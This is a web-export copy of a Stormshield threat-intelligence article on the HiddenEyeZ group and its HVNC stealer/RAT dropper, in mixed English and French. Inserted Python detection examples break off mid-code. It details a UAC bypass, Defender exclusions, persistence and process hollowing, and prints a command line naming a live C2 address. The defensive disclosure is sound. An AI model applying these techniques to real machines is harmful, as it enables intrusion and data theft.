{"id":414036,"date":"2023-05-25T15:00:23","date_gmt":"2023-05-25T14:00:23","guid":{"rendered":"https:\/\/www.stormshield.com\/?p=414036"},"modified":"2024-01-30T15:43:04","modified_gmt":"2024-01-30T14:43:04","slug":"groupe-cybercriminel-hiddeneyez-carte-identite-malwares","status":"publish","type":"post","link":"https:\/\/www.stormshield.com\/fr\/actus\/groupe-cybercriminel-hiddeneyez-carte-identite-malwares\/","title":{"rendered":"HiddenEyeZ cybercriminal group: identity card"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<strong>While analysing a recent RedLine stealer distribution campaign, Stormshield's Cyber Threat Intelligence team (<em>Stormshield Customer Security Lab<\/em>, SCSL) got hold of malware samples originating from a cybercriminal group named HiddenEyeZ. History, activity, business model and technical analysis of the malicious files that make up its malware: this is the identity card of the HiddenEyeZ cybercriminal group.<\/strong><\/p>\n<p>Our security researchers dug into this group to learn more about its activity, its business model and its victims. 
A closer look at a young cybercriminal group, HiddenEyeZ.[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h2>From RedLine to HiddenEyeZ<\/h2>\n<p>Our analysis of <a href=\"https:\/\/www.stormshield.com\/fr\/actus\/malware-redline-extension-chrome-campagne-malveillante-envergure\/\">a RedLine campaign<\/a> uncovered repositories holding malware samples. Some of those samples could not be tied to the attacks carried out in that RedLine campaign. Looking at them more closely, we found that the operators of the campaign were using malware sold by a cybercriminal group: HiddenEyeZ.<\/p>\n<p>This analysis rests mainly on the samples found in those repositories and on a public Telegram channel on which HiddenEyeZ advertises its services. 
Starting from these pieces of information, we directed our research at learning more about the group, its services, its business model, its organisation and its known victims.[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h2>HiddenEyeZ: a closer look at a cybercriminal group<\/h2>\n<h3>Introducing HiddenEyeZ<\/h3>\n<p>HiddenEyeZ is a cybercriminal organisation whose offering revolves around the theft of sensitive data, either by selling a malware that harvests data from an infected device or by directly selling data the group has harvested itself.<\/p>\n<p>The group has shown signs of activity since July 2022 and has been advertising its commercial offering since December of the same year.<\/p>\n<p>The material we obtained shows that the group consists of at least six people: one developer and five customer-support staff.<\/p>\n<h3>History and activity of HiddenEyeZ<\/h3>\n<p>From the material collected, we were able to reconstruct the group's activity timeline. 
The data indicate that preparations lasted several months, or even years if the actors themselves are to be believed.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414037\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 1: introductory message posted by HiddenEyeZ on one of its Telegram channels<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]The second half of 2022 was mostly devoted to putting resources in place. We sorted these events into three categories:<\/p>\n<ul>\n<li>technical preparation steps (orange), that is, the actions the cybercriminal group carried out before the campaign started;<\/li>\n<li>communication actions (green), that is, events relating to communication with customers (such as the creation of communication channels and the publication of offers);<\/li>\n<li>updates to the HiddenEyeZ HVNC product (blue), that is, releases of major new versions. These events show that development has continued actively since the offering was launched. 
Many other features were also added along the way that are not marked on this timeline.<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414042\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 2: timeline of the HiddenEyeZ group's activity since July 2022<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]At the time of writing, the criminal group is still active on Telegram.<\/p>\n<p>Several clues in these Telegram channels, such as screenshots or messages that mention posting times, make it possible to place the group around the UTC-6 time zone, which covers the following main countries (non-exhaustive list):<\/p>\n<ul>\n<li>Canada;<\/li>\n<li>United States;<\/li>\n<li>Mexico.<\/li>\n<\/ul>\n<p>Plotting how often messages are posted on the group's Telegram channels over the course of the day gives an activity graph. 
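The activity-hour analysis described above, as an added example; this is not code from the original article or from Stormshield's lab, and the message timestamps it runs on are constructed to mimic a UTC-6 working day rather than taken from the real channels. It bins UTC timestamps by hour, measures the activity range, finds the densest contiguous window and turns that window's start into a candidate UTC offset under the assumption (a parameter, not a fact from the page) that the actors start posting around 08:00 local time. The same curve would be produced by a night-shift operator several zones east, which is why the article cross-checks the offset against screenshots and posting times rather than relying on the histogram alone.

```python
from collections import Counter
from datetime import datetime, timedelta, timezone


def constructed_messages():
    """Constructed sample, not real channel data: for one week, two posts in
    every UTC hour from 14:00 to 04:00 the next day, with a burst at 21:00 UTC.
    That is 08:00 through the 22:00 hour, local time, for someone at UTC-6."""
    base = datetime(2023, 3, 6, tzinfo=timezone.utc)
    msgs = []
    for day in range(7):
        for hour in range(14, 29):  # 14..28 -> 14:00 UTC through 04:00 UTC next day
            n = 4 if hour == 21 else 2
            for k in range(n):
                msgs.append(base + timedelta(days=day, hours=hour, minutes=7 * k))
    return msgs


def hourly_histogram(timestamps):
    """Number of messages per UTC hour, as a 24-entry list (index = hour)."""
    counts = Counter(ts.astimezone(timezone.utc).hour for ts in timestamps)
    return [counts.get(h, 0) for h in range(24)]


def active_span_hours(hist):
    """How many distinct UTC hours saw at least one message (the activity range)."""
    return sum(1 for c in hist if c > 0)


def active_window(hist, width):
    """Start hour (UTC) of the contiguous window of `width` hours, wrapping past
    midnight, that contains the most messages, plus the count it holds."""
    best_start, best_total = 0, -1
    for start in range(24):
        total = sum(hist[(start + i) % 24] for i in range(width))
        if total > best_total:
            best_start, best_total = start, total
    return best_start, best_total


def infer_utc_offset(hist, width, local_day_start=8):
    """Candidate UTC offset in [-12, 11], assuming the actors' day starts at
    `local_day_start` local time. This is an assumption about working habits,
    not a measurement: a night worker at UTC+2 gives the same curve as a day
    worker at UTC-6, so corroborate it with other clues (screenshots, locale)."""
    start, _ = active_window(hist, width)
    return (local_day_start - start + 12) % 24 - 12


if __name__ == "__main__":
    hist = hourly_histogram(constructed_messages())
    width = active_span_hours(hist)
    print("messages per UTC hour:", hist)
    print("activity range: %d hours, window starts %02d:00 UTC"
          % (width, active_window(hist, width)[0]))
    print("candidate offset: UTC%+d" % infer_utc_offset(hist, width))
```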
The messages are spread over a 15-hour range.<\/p>\n<ul>\n<li>In blue, the number of messages exchanged during the week on the Telegram channel used to share hacking tutorials;<\/li>\n<li>In orange, the number of messages posted on the group's announcement channel;<\/li>\n<li>In grey, the sum of the two curves.<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414047\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 3: analysis of activity hours on the HiddenEyeZ group's Telegram channels<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h3>HiddenEyeZ's business model<\/h3>\n<p>The group offers several products and services, such as a licence for its HiddenEyeZ HVNC malware (a RAT and stealer) or batches of information stolen from the victims of the botnet it operates.<\/p>\n<p>The group's offers in more detail:<\/p>\n<ul>\n<li>HiddenEyeZ HVNC: this malware, developed by the criminal group, is a RAT and a stealer that lets an attacker harvest sensitive data from victims' machines (passwords, banking data, session cookies, cryptocurrency wallets, etc.). 
A more detailed analysis of this malware is given later in this article;<\/li>\n<li>HiddenCrypt: this service lets a customer obfuscate a payload before deploying it on a victim, so as to evade the security products (antivirus, network sensors, etc.) that may be in place at the victim's;<\/li>\n<li>Botnet Log Packs: this offer lets a customer buy outright a set of data harvested from victims. The data are sold by specific theme: banking data, cryptocurrency wallets or credentials for cryptocurrency services;<\/li>\n<li>malware distribution: this service lets a customer deploy a malware directly on the victims of the botnet operated by the cybercriminal group;<\/li>\n<li>tutorials: this offer gives a customer access to cybercrime documentation on specific topics: botnets, malware, spamming;<\/li>\n<li>after-sales support on Telegram.<\/li>\n<\/ul>\n<p>Using the HiddenEyeZ HVNC malware costs a few hundred dollars per month, and a lifetime licence costs 1,500 dollars. 
Note that the group resorts to conventional commercial practices, such as limited-time promotions.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414052\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 4: message posted by HiddenEyeZ on a Telegram channel announcing a promotion on licence purchases<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]Sales are made directly through a Telegram bot or via sellix.io, a payment platform for digital goods that accepts cryptocurrencies.<\/p>\n<h3>Relationships between HiddenEyeZ's Telegram accounts<\/h3>\n<p>The HiddenEyeZ group uses many Telegram accounts tied to the services it offers. 
They include:<\/p>\n<ul>\n<li>the account of the channel on which commercial information is published;<\/li>\n<li>the \"personal\" account of the developer of the HiddenEyeZ HVNC malware;<\/li>\n<li>a generic account for contacting the support team;<\/li>\n<li>five \"personal\" accounts belonging to the support team;<\/li>\n<li>a support bot that serves an FAQ;<\/li>\n<li>a bot for subscribing to the services;<\/li>\n<li>a bot for buying and using a payload-obfuscation service;<\/li>\n<li>a bot that publishes samples of victim data;<\/li>\n<li>the developer's account dedicated to sharing hacking tutorials.<\/li>\n<\/ul>\n<p>Three channels were identified in connection with this group:<\/p>\n<ul>\n<li>the main channel, used to publish commercial information about the various offers;<\/li>\n<li>a private channel for exchanging with buyers of the HiddenEyeZ HVNC malware;<\/li>\n<li>a channel dedicated to sharing hacking tutorials.<\/li>\n<\/ul>\n<h3>Targets and victims of HiddenEyeZ<\/h3>\n<p>The HiddenEyeZ group publishes samples of victim logs on its Telegram channel as a demonstration for prospective customers.<\/p>\n<p>From the data of a sample of 103 victims, we were able to build the following map of where the victims are located. 
The sample we hold is only a very partial one, since this campaign has at least a thousand victims.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414057\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 5: map of the HiddenEyeZ group's victims. Countries in yellow have between one and five victims in the sample; those in orange have more than five<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]Although this sample is not representative of the whole victim population, it shows that the victims are spread across the world. Two oddities of the sample: not a single victim was observed in France or in the United States.<\/p>\n<p>This is all the more surprising since messages posted on a Telegram channel show a particular interest in certain countries, such as the United States. The first message shows that United States banking information is specifically targeted. 
The next two show that the cybercriminal group puts a commercial premium on information harvested from victims in that country:[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414062\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_empty_space height=\"2px\"][vc_single_image image=\"414067\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_empty_space height=\"2px\"][vc_single_image image=\"414072\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 6: three messages published by the HiddenEyeZ group on one of its Telegram channels, showing an interest in the United States<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h2>Analysis of the malicious files of the HiddenEyeZ HVNC malware<\/h2>\n<p>Having studied how the HiddenEyeZ group operates, we now turn to the HiddenEyeZ HVNC malware, its main product.<\/p>\n<p>We studied the HiddenEyeZ HVNC malware ecosystem from the point where its dropper runs after the initial infection. 
Namely:<\/p>\n<ul>\n<li>the HiddenEyeZ HVNC dropper;<\/li>\n<li>HiddenEyeZ HVNC: the malware itself;<\/li>\n<li>r77: the rootkit deployed by HiddenEyeZ HVNC to increase its stealth;<\/li>\n<li>Icarus: the stealer deployed by HiddenEyeZ HVNC to harvest the victim's data automatically;<\/li>\n<li>Highlander: a tool deployed by HiddenEyeZ HVNC that disables Windows Defender;<\/li>\n<li>AddStartupTask: a tool deployed by HiddenEyeZ HVNC that sets up persistence.<\/li>\n<\/ul>\n<p>Here is an overview of the interactions between the various binaries and the servers they use:[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414077\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 7: interactions between the components of the HiddenEyeZ HVNC malware<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h3>HiddenEyeZ HVNC dropper<\/h3>\n<h4>Malware identity card<\/h4>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_0\" id='ninja_table_builder_414281' data-ninja_table_builder_instance=\"ninja_table_builder_instance_0\"><table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414281\"><tbody class=\"tbody\"><tr><td>Type of file<\/td><td>PE<\/td><\/tr><tr><td>Language used<\/td><td>.NET<\/td><\/tr><tr><td>Compilation date<\/td><td>Thu May 6 23:56:32 2038 (incoherent: a date in the future)<\/td><\/tr><tr><td>Obfuscation<\/td><td>Renaming of namespaces, classes and functions<\/td><\/tr><tr><td>md5<\/td><td>4c9bc0e73872ba91b88fda7a45e5379a<\/td><\/tr><tr><td>sha1<\/td><td>be23cf7d356b13a3f233c6b3d807854e8083bd2d<\/td><\/tr><tr><td>sha256<\/td><td>bb86e41bb6d5eccad1ff84ab343506f4f5fcd78b0618966edc0ae0e05fcc8683<\/td><\/tr><tr><td>ssdeep<\/td><td>3072:L6IxdMnKhwoa5riuHNTapbBgn4qBwS7YXzwIjD6ZGsp:pMnKa5rirpbGn4awS7YXzwIjuZGs<\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h4>Overview<\/h4>\n<p>This first sample, named Installs.exe, was found in one of the Bitbucket.org repositories studied in <a href=\"https:\/\/www.stormshield.com\/fr\/actus\/malware-redline-extension-chrome-campagne-malveillante-envergure\/\">our previous article on the RedLine campaign<\/a>. This binary was our entry point into the HiddenEyeZ group and its environment.<\/p>\n<p>This sample is a dropper and a RAT whose main purpose is to deploy stealers, which then collect the victims' sensitive information. It also embeds and deploys the main component of the HiddenEyeZ HVNC malware. It has many capabilities, including:<\/p>\n<ul>\n<li>deploying a rootkit;<\/li>\n<li>deploying a stealer;<\/li>\n<li>antivirus evasion;<\/li>\n<li>setting up persistence;<\/li>\n<li>deploying the main HiddenEyeZ HVNC component.<\/li>\n<\/ul>\n<p>The infection methods used seem to play on the victims' credulity. Messages on HiddenEyeZ's Telegram channel mention social-media posts with enticing content designed to lead the victim to download an image pack. 
Parmi ces images, serait ins\u00e9r\u00e9 un fichier malveillant sous la forme d'un fichier .scr (type de fichiers ex\u00e9cutables sur Windows).<\/p>\n<p>Une autre m\u00e9thode est l'utilisation d'un bot Discord ayant pour but d'usurper le compte d'une victime pour infecter ses contacts et salons fr\u00e9quent\u00e9s.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414082\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 8 : message sur un canal Telegram du groupe HiddenEyeZ annon\u00e7ant un outil d'infection via Discord<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h4>D\u00e9ploiement d'un rootkit<\/h4>\n<p>Pour s'assurer d\u2019un bon niveau de furtivit\u00e9, le sample a la capacit\u00e9 de d\u00e9ployer un rootkit (outil de dissimulation d'activit\u00e9) en mode utilisateur, nomm\u00e9 r77 (<em>voir la partie\u00ab\u00a0<\/em><em>r77\u00a0\u00bb<\/em>). Le code suivant r\u00e9cup\u00e8re l'installateur du rootkit (rt.jpg) \u00e0 partir d'une URL stock\u00e9e en dur et le place dans un dossier temporaire. 
Le fichier est ensuite d\u00e9cod\u00e9, ex\u00e9cut\u00e9 et supprim\u00e9 afin d'effacer la trace de son d\u00e9ploiement.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414087\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 9 : code de d\u00e9ploiement du rootkit r77 dans le dropper de HiddenEyeZ HVNC<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h4>D\u00e9ploiement d'un stealer<\/h4>\n<p>Le dropper permet aussi de d\u00e9ployer un stealer connu, que ce soit StormKitty ou Prynt Stealer. Nous ne pouvons pas statuer sur la souche du malware exacte car les deux sont tr\u00e8s proches.<\/p>\n<ul>\n<li>StormKitty est un malware dont les sources sont disponibles publiquement sur GitHub. Il est apparu en 2020 et son d\u00e9veloppement s'est achev\u00e9 durant cette m\u00eame ann\u00e9e.<\/li>\n<li>De son c\u00f4t\u00e9, Prynt Stealer est une \u00e9volution de StormKitty, apparue en 2022 et vendue sur le darknet. Nous avons retrouv\u00e9 parmi les samples \u00e9tudi\u00e9s un builder de Prynt Stealer, ce qui nous fait penser que le stealer d\u00e9ploy\u00e9 serait de ce type.<\/li>\n<\/ul>\n<p>Ce stealer est t\u00e9l\u00e9charg\u00e9 depuis une URL stock\u00e9e en dur sur le d\u00e9p\u00f4t distant sous le nom patata.jpg. Il est alors d\u00e9cod\u00e9 et stock\u00e9 sur le disque dans un dossier temporaire sous le nom svchost.exe. Un script svchost.bat est cr\u00e9\u00e9 pour l'occasion. 
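<\/p>
<p>Both downloads described in this section, the rootkit installer rt.jpg and the stealer patata.jpg, are fetched under an image file name and only become executables once the dropper decodes them. The following Python example is added here and is not code from the article or from HiddenEyeZ: it classifies a downloaded body by its magic bytes rather than by its name, peels off up to two layers of base64 (the dropper uses the same double encoding for its embedded RAT) and flags any image-named URL whose content is not an image. The URLs, the hostname example.invalid and the MZ stub are constructed test data.<\/p>

```python
import base64
import re
from dataclasses import dataclass


# Constructed sample downloads (not real HiddenEyeZ payloads): a URL as a
# proxy log would record it, plus the response body.
@dataclass
class Download:
    url: str
    body: bytes


IMAGE_EXT = ('.jpg', '.jpeg', '.png', '.gif')
_B64_RE = re.compile(rb'^[A-Za-z0-9+/]+={0,2}$')


def b64_layers(data: bytes, layers: int) -> bytes:
    """Wrap data in `layers` rounds of base64, as the dropper's payloads are."""
    for _ in range(layers):
        data = base64.b64encode(data)
    return data


def classify_body(body: bytes) -> str:
    """Say what the bytes are, ignoring whatever file name they came under."""
    if body.startswith(b'\xff\xd8\xff'):
        return 'jpeg'
    if body.startswith(b'\x89PNG\r\n\x1a\n'):
        return 'png'
    if body.startswith((b'GIF87a', b'GIF89a')):
        return 'gif'
    if body.startswith(b'MZ'):
        return 'pe'
    # The dropper decodes its downloads before running them: peel off up to
    # two base64 layers and look for a PE header underneath.
    layer = b''.join(body.split())
    for _ in range(2):
        if not _B64_RE.match(layer):
            break
        try:
            layer = base64.b64decode(layer, validate=True)
        except ValueError:
            break
        if layer.startswith(b'MZ'):
            return 'base64-pe'
        layer = b''.join(layer.split())
    return 'unknown'


def assess(d: Download) -> dict:
    """Flag a download whose image-like name does not match its content."""
    path = d.url.split('?', 1)[0].lower()
    kind = classify_body(d.body)
    mismatch = path.endswith(IMAGE_EXT) and kind not in ('jpeg', 'png', 'gif')
    return {'url': d.url, 'kind': kind, 'suspicious': mismatch}


# Constructed MZ stub standing in for a real PE; it is not a runnable binary.
FAKE_PE = b'MZ\x90\x00' + b'\x00' * 60

SAMPLES = [
    Download('https://example.invalid/cats/01.jpg', b'\xff\xd8\xff\xe0\x00\x10JFIF\x00'),
    Download('https://example.invalid/cdn/rt.jpg', b64_layers(FAKE_PE, 1)),
    Download('https://example.invalid/cdn/patata.jpg', b64_layers(FAKE_PE, 2)),
    Download('https://example.invalid/tools/setup.exe', FAKE_PE),
]


def suspicious_downloads(samples=SAMPLES) -> list:
    """URLs whose image name hides something that is not an image."""
    return [a['url'] for a in map(assess, samples) if a['suspicious']]


if __name__ == '__main__':
    for s in SAMPLES:
        print(assess(s))
```

<p>The check is deliberately name-agnostic: a proxy or sandbox that trusts the .jpg extension or the Content-Type header passes these files through, while the first three bytes of the body are enough to tell a JPEG from an encoded PE.<\/p>
<p>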
It then runs the stealer and deletes itself.<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 10: stealer deployment code in the HiddenEyeZ HVNC dropper<\/small><\/em><\/p>\n<p>This stealer can, for example, collect:<\/p>\n<ul>\n<li>system information (version, CPU, GPU, RAM, IP addresses, BSSID, location, screen metrics, installed software);<\/li>\n<li>data managed by web browsers (passwords, credit cards, cookies, history, bookmarks);<\/li>\n<li>Wi-Fi network information (SSID, BSSID);<\/li>\n<li>files selected by type (documents, images, source code, databases);<\/li>\n<li>data that allows signing in to software sessions:\n<ul>\n<li>gaming platforms (Steam, Uplay, Battle.Net, Minecraft);<\/li>\n<li>communication software (Telegram, Outlook, Pidgin, Skype, Discord);<\/li>\n<li>FileZilla;<\/li>\n<li>VPNs (ProtonVPN, OpenVPN, NordVPN);<\/li>\n<\/ul>\n<\/li>\n<li>keystrokes;<\/li>\n<li>clipboard contents;<\/li>\n<li>screenshots and webcam captures;<\/li>\n<li>cryptocurrency wallets;<\/li>\n<li>the process list.<\/li>\n<\/ul>\n<h4>Antivirus evasion<\/h4>\n<p>To avoid raising alarms, the sample adds itself to the Windows Defender exclusions with the Add-MpPreference PowerShell cmdlet. Since this requires administrator rights on the machine, the binary uses a well-known UAC (User Account Control) bypass based on computerdefaults.exe. The method consists of placing a command in the registry key <code>HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command<\/code> (the technique also relies on an empty <code>DelegateExecute<\/code> value in that key) and then launching <code>ComputerDefaults.exe<\/code>. ComputerDefaults.exe is a Microsoft binary that auto-elevates, so the planted command runs with administrator rights and no UAC prompt appears, provided the current user is a member of the local Administrators group and UAC is at its default level rather than \"Always notify\". Because the hijacked key lives under HKCU, writing it requires no privileges at all, which also makes that key a cheap and reliable detection point.<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 11: code setting up the Windows Defender exclusion in the HiddenEyeZ HVNC dropper<\/small><\/em><\/p>\n<h4>Setting up persistence<\/h4>\n<p>The dropper sets up a persistence mechanism to make sure it is relaunched at the next system reboot. To do so, it registers its executable in the registry key <code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce<\/code>. The registry change is delegated to a VBS script written to <code>%LOCALAPPDATA%\\excecution.vbs<\/code> (the misspelling is the malware's own). Note that Windows deletes a RunOnce value once it has run, so this only guarantees a single relaunch unless the dropper re-registers itself each time it starts.<\/p>\n<h4>Deploying the main HiddenEyeZ HVNC component<\/h4>\n<p>The sample also embeds another module that performs the typical actions of a RAT: HiddenEyeZ HVNC (<em>see the HiddenEyeZ HVNC section<\/em>). It is contained in the dropper executable, doubly base64-encoded.<\/p>\n<p>HiddenEyeZ HVNC is launched using process hollowing, implemented in the dropper's TryRun method. First, cvtres.exe (a utility shipped with the .NET Framework) is started in a suspended state. The original image is then unmapped from the process memory and the RAT module is written in its place. The process is finally resumed and begins executing the RAT code.<\/p>\n<p>HiddenEyeZ HVNC thus appears as a legitimate execution of cvtres.exe. In our case, the visible command line was: <code>\"cvtres.exe HiddenEyeZ_Client 5.75.162.221 8081 mPgxExkLE\"<\/code>. Note the reference to HiddenEyeZ and the address of the command-and-control server. A genuine cvtres.exe is normally spawned by the C# compiler with switch-style arguments such as /NOLOGO and /OUT:, so a cvtres.exe process whose arguments contain an IP address and a port is a strong indicator on its own. 
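<\/p>
<p>Taken together, the dropper's steps leave a short list of host artefacts: a write to the ms-settings shell handler under HKCU, an Add-MpPreference exclusion, a RunOnce value pointing at the dropper, ComputerDefaults.exe spawned from a user-writable path and a cvtres.exe process whose arguments carry an IP address and a port. The Python below is an added example, not code from the article or from Stormshield's tooling: it runs those five checks over a constructed stream of Sysmon-style events (EventID 13 registry value set, EventID 1 process create; the field names follow Sysmon's, but the events, paths and SIDs are made up) and parses the C2 host and port out of the observed cvtres.exe command line. The benign csc.exe-spawned cvtres.exe event shows why the rule keys on the argument shape rather than on the image name.<\/p>

```python
import re

# Constructed Sysmon-style events. Field names follow Sysmon (EventID 13 =
# registry value set, EventID 1 = process create) but every path, SID and
# command line here is made up for the example.
EVENTS = [
    {'EventID': 13, 'Image': 'C:\\Users\\victim\\Downloads\\Installs.exe',
     'TargetObject': 'HKU\\S-1-5-21-1\\Software\\Classes\\ms-settings\\shell\\open\\command\\DelegateExecute',
     'Details': ''},
    {'EventID': 13, 'Image': 'C:\\Users\\victim\\Downloads\\Installs.exe',
     'TargetObject': 'HKU\\S-1-5-21-1\\Software\\Classes\\ms-settings\\shell\\open\\command\\(Default)',
     'Details': 'powershell -c Add-MpPreference -ExclusionPath C:\\Users\\victim\\Downloads'},
    {'EventID': 1, 'Image': 'C:\\Windows\\System32\\ComputerDefaults.exe',
     'ParentImage': 'C:\\Users\\victim\\Downloads\\Installs.exe',
     'CommandLine': 'ComputerDefaults.exe'},
    {'EventID': 13, 'Image': 'C:\\Windows\\System32\\wscript.exe',
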